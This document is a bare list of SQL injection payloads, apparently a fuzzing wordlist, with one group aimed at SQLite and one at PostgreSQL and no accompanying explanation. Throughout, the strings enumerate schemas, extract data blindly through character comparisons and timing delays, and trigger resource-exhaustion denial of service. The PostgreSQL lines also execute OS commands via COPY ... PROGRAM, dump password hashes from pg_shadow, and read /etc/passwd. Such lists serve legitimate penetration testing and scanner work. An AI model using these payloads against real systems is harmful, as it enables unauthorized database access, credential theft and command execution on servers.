1' UNION SELECT sql FROM sqlite_master-- -
1' UNION SELECT name FROM sqlite_master WHERE type='table'-- -
1' UNION SELECT tbl_name FROM sqlite_master-- -
1' UNION SELECT GROUP_CONCAT(name) FROM pragma_table_info('users')-- -
1' AND UNICODE(SUBSTR((SELECT name FROM sqlite_master LIMIT 1),1,1))>64-- -
1' UNION SELECT sqlite_version()-- -
1' UNION SELECT GROUP_CONCAT(sql) FROM sqlite_master-- -
1' AND RANDOMBLOB(500000000)-- -
1' AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))-- -
1' UNION SELECT name||':'||sql FROM sqlite_master-- -

1' UNION SELECT version()-- -
1' UNION SELECT current_user-- -
1' UNION SELECT current_database()-- -
1' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1-- -
1' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1-- -
1' UNION SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema='public'-- -
1'; COPY (SELECT '') TO PROGRAM 'id'-- -
1'; CREATE TABLE cmd_output(output text); COPY cmd_output FROM PROGRAM 'id'-- -
1' UNION SELECT CAST(usename||':'||passwd AS text) FROM pg_shadow-- -
1'; SELECT lo_import('/etc/passwd')-- -
1'; SELECT pg_read_file('/etc/passwd',0,1000)-- -
1' AND 1=(SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE 1 END)-- -
1' AND (SELECT CASE WHEN (SUBSTRING(version(),1,1)='P') THEN pg_sleep(5) ELSE pg_sleep(0) END) IS NOT NULL-- -
